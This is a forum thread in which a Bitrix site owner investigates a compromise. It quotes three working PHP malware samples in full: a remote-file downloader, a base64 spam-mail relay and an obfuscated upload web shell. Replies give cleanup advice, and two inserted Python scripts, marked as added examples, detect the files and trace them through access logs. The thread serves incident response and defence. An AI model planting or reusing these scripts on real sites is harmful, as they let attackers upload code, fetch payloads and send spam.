1C-Bitrix
DYLAN, 2019-05-17 12:45:35

How to track a virus on a website?

There is a Bitrix site installed on a VDS. Recently I found strange code in index.php (the code is encrypted PHP), and along with it various files such as
hh.ru
mama332.php
wp-cron-sample.php
etc. appear. The contents of the files are as follows:

<?php
function class_x_i($x = ''){
$urlset = isset($_GET['name']) ? trim($_GET['name']) : '';
$filename = isset($_GET['file']) ? trim($_GET['file']) : '';
$ch = curl_init('http://'.$urlset);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
file_put_contents($filename,$result);
echo 'O1024K';
}
class_x_i();
?>

<?php
if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
  {
  echo "indata_error";
  exit;
  }
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
  {
  echo "indata_error";
  exit;
  }
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
  {
  echo "indata_error";
  exit;
  }
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
  {
  echo "indata_error";
  exit;
  }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
  echo "sent_ok";
else
  echo "sent_error";
?>

How can you trace the source that initiates the creation of these files?
1. You can log all requests to the site and, if these files appear again, look for a connection with particular requests, because the virus may be getting into the site through some script.
2. I checked cron and didn't find anything criminal; it just runs cron_events.php, which is all standard.
3. I didn't find anything in the Bitrix agents either; at the time these files appeared, not a single agent was running.


3 answer(s)
Anton Shamanov, 2019-05-17
@SilenceOfWinter

change passwords, update software, transfer the admin panel, Casper and the web have online verification

Yaroslav Alexandrov, 2019-05-17
@alexyarik

You don't need to look for the source now; you need to do prevention:
1) Connect an antivirus to the VDS service at the hosting provider, set up a daily check, and check the account's files.
2) Change all credentials: website, database, FTP (SSH), hosting panel.
3) Restore the site from a backup dated before the hack.
4) If there is no backup, install the "Trojan Search" module from the marketplace and run the site through it; if there are infected system files, reload the Bitrix core and modules.
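The answer above recommends the marketplace "Trojan Search" module for finding dropped files. As an added example (not the module's code and not part of this thread), the script below shows the kind of heuristic such a scan relies on, tuned to the three samples in the question: a file is flagged when request data (`$_GET`, `$_POST`, `$_FILES`) meets a file, network, mail or exec sink, or when a function name is split by an inline comment like `/*;*/`. The fixture files it writes to a temporary directory are constructed fragments that mirror the samples, not copies of them; the marker lists and file names are this example's assumptions.

```python
"""Heuristic scan of a web root for dropped PHP scripts (added example)."""
import os
import re
import tempfile

# Request data sources and the sinks the samples hand that data to.
SOURCES = re.compile(r"\$_(GET|POST|REQUEST|FILES|COOKIE)\b")
SINKS = re.compile(
    r"\b(file_put_contents|curl_exec|mail|move_uploaded_file|eval|assert|"
    r"system|exec|shell_exec|passthru)\s*(/\*.*?\*/\s*)?\("
)
# "name/*;*/(" : a comment wedged between a function name and its call,
# used to defeat naive signature matching; almost never seen in real code.
COMMENT_SPLIT = re.compile(r"\w+\s*/\*.*?\*/\s*\(")
# Runtime decoding is common in legitimate Bitrix code too, so it is only
# reported as supporting evidence, never as the sole trigger.
DECODERS = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(")


def classify(src):
    """Return (suspicious, reasons) for one file's source text."""
    has_source = bool(SOURCES.search(src))
    has_sink = bool(SINKS.search(src))
    split = bool(COMMENT_SPLIT.search(src))
    decode = bool(DECODERS.search(src))
    reasons = []
    if has_source:
        reasons.append("reads request data")
    if has_sink:
        reasons.append("calls a file/network/mail/exec sink")
    if split:
        reasons.append("comment-split function call")
    if decode:
        reasons.append("runtime decoding")
    return (has_source and has_sink) or split, reasons


def scan_tree(root, exts=(".php",)):
    """Walk root, classify each PHP file, newest modification first."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                suspicious, reasons = classify(fh.read())
            if suspicious:
                hits.append({"path": path, "mtime": os.path.getmtime(path), "reasons": reasons})
    hits.sort(key=lambda h: h["mtime"], reverse=True)
    return hits


# Constructed fixtures: minimal fragments with the same markers as the samples.
SAMPLES = {
    "mama332.php": "<?php\n// fixture: request parameter flows into a file write\n"
                   "$f = trim($_GET['file']);\nfile_put_contents($f, curl_exec($ch));\n",
    "wp-cron-sample.php": "<?php\n// fixture: decoded POST fields handed to mail()\n"
                          "$to = base64_decode($_POST['mailto']);\nmail($to, $s, $b, $h);\n",
    "license.php": "<?php\n// fixture: upload handler with comment-split calls\n"
                   "if (is_uploaded_file/*;*/($_FILES['f']['tmp_name']))\n"
                   "  move_uploaded_file/*;*/($_FILES['f']['tmp_name'], $_FILES['f']['name']);\n",
    "clean.php": "<?php\n// fixture: ordinary template code\necho htmlspecialchars($title);\n",
}


def demo():
    """Write the fixtures to a temp dir and return {file name: reasons} for the hits."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLES.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return {os.path.basename(h["path"]): h["reasons"] for h in scan_tree(root)}


if __name__ == "__main__":
    for name, reasons in demo().items():
        print(name, "->", ", ".join(reasons))
```

A contact form that reads `$_POST` and calls `mail()` will trip the same rule, so every hit still needs a look by hand, and comparing the tree against a clean copy of the same Bitrix version (or a backup from before the incident) is what separates a dropped file from a legitimate one.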

DYLAN, 2019-05-17
@ermolaev_nikita

In the logs I tracked down a certain license.php file through which the files were uploaded:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
<title>utf</title>
</head>
<body>
<?php
print "<h1>#[email protected][email protected]#</h1>\n";
echo "Your IP: ";
echo $_SERVER['REMOTE_ADDR'];
echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
echo "<input type=\"file\" name=\"filename\"><br> \n";
echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
echo "</form>\n";
if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))
  {
  move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
  $file = $_FILES/*;*/["filename"]["name"];
  echo "<a href=\"$file\">$file</a>";
  } else {
  echo("empty");
  }
$filename = $_SERVER[SCRIPT_FILENAME];
touch/*;*/($filename, $time);
?>
</body>
</html>

However, its creation date is not known, so it is impossible to tell exactly when the infection happened and through what =((
Using the "Trojan Search" solution from the marketplace, I found a bunch of files with encrypted PHP code and changed all the passwords; we'll wait.
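Point 1 of the question (log all requests and connect the next dropped file to a request) and the follow-up above (license.php found through the logs) describe the same procedure: take the timestamp of a file that should not exist and read the access log backwards from it. The script below is an added example of that correlation, not code from the thread. It parses Apache/nginx "combined" log lines, keeps the requests from the minutes before the file appeared, and ranks the ones that behave like the samples: a POST to a script outside the Bitrix tree (the uploader), `?name=...&file=...` parameters (the downloader), or a `file=` value naming the dropped file itself. The log lines, addresses and timestamps are constructed for the example; the field order of a real log may differ. Note that the license.php sample ends with `touch()` on its own file, which resets the modification time, so the anchor comes from `st_ctime` (inode change time), which `touch` cannot set.

```python
"""Correlate a dropped file's timestamp with the access log (added example)."""
import os
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs

# Combined log format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RX.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"], _, query = rec["target"].partition("?")
    rec["params"] = parse_qs(query)
    return rec


def file_created_at(path):
    """Anchor on the inode change time: mtime can be rewritten by touch()."""
    return datetime.fromtimestamp(os.stat(path).st_ctime, tz=timezone.utc)


def suspicious_reasons(rec, dropped_name):
    """Why one request looks like the samples in the thread (empty list = nothing)."""
    reasons = []
    if rec["method"] == "POST" and rec["path"].endswith(".php") and not rec["path"].startswith("/bitrix/"):
        reasons.append("POST to a script outside the Bitrix tree")
    if {"name", "file"} <= set(rec["params"]):
        reasons.append("name=/file= fetch-and-write parameters")
    if dropped_name in rec["params"].get("file", []):
        reasons.append("file= names the dropped file")
    if rec["ua"].lower().startswith(("curl", "python", "wget")):
        reasons.append("scripted client")
    return reasons


def trace_drop(log_lines, created_at, dropped_name, window=timedelta(minutes=5)):
    """Requests in [created_at - window, created_at], most suspicious then most recent first."""
    hits = []
    for line in log_lines:
        rec = parse_line(line)
        if rec is None or not (created_at - window <= rec["time"] <= created_at):
            continue
        hits.append({"ip": rec["ip"], "time": rec["time"], "path": rec["path"],
                     "reasons": suspicious_reasons(rec, dropped_name)})
    hits.sort(key=lambda h: (-len(h["reasons"]), created_at - h["time"]))
    return hits


# Constructed sample log (documentation addresses, fictitious timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [17/May/2019:12:38:02 +0300] "GET /bitrix/admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [17/May/2019:12:39:10 +0300] "GET /index.php HTTP/1.1" 200 15000 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/May/2019:12:40:15 +0300] "POST /upload/license.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/May/2019:12:40:21 +0300] "GET /upload/mama332.php?name=example.com/x.txt&file=wp-cron-sample.php HTTP/1.1" 200 6 "-" "curl/7.64.0"',
    '198.51.100.4 - - [17/May/2019:12:41:00 +0300] "GET /index.php HTTP/1.1" 200 15000 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]
# Constructed ctime of the dropped wp-cron-sample.php, one second after the fetch request.
DROPPED_AT = datetime(2019, 5, 17, 12, 40, 22, tzinfo=timezone(timedelta(hours=3)))


def demo():
    return trace_drop(SAMPLE_LOG, DROPPED_AT, "wp-cron-sample.php")


if __name__ == "__main__":
    for h in demo():
        print(h["time"].isoformat(), h["ip"], h["path"], h["reasons"])
```

On a real host the anchor is `file_created_at(path)` and the lines come from the rotated access logs covering that window; the first ranked hit gives the request, and with it the source address and the script that was used, which is what the question asks for.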
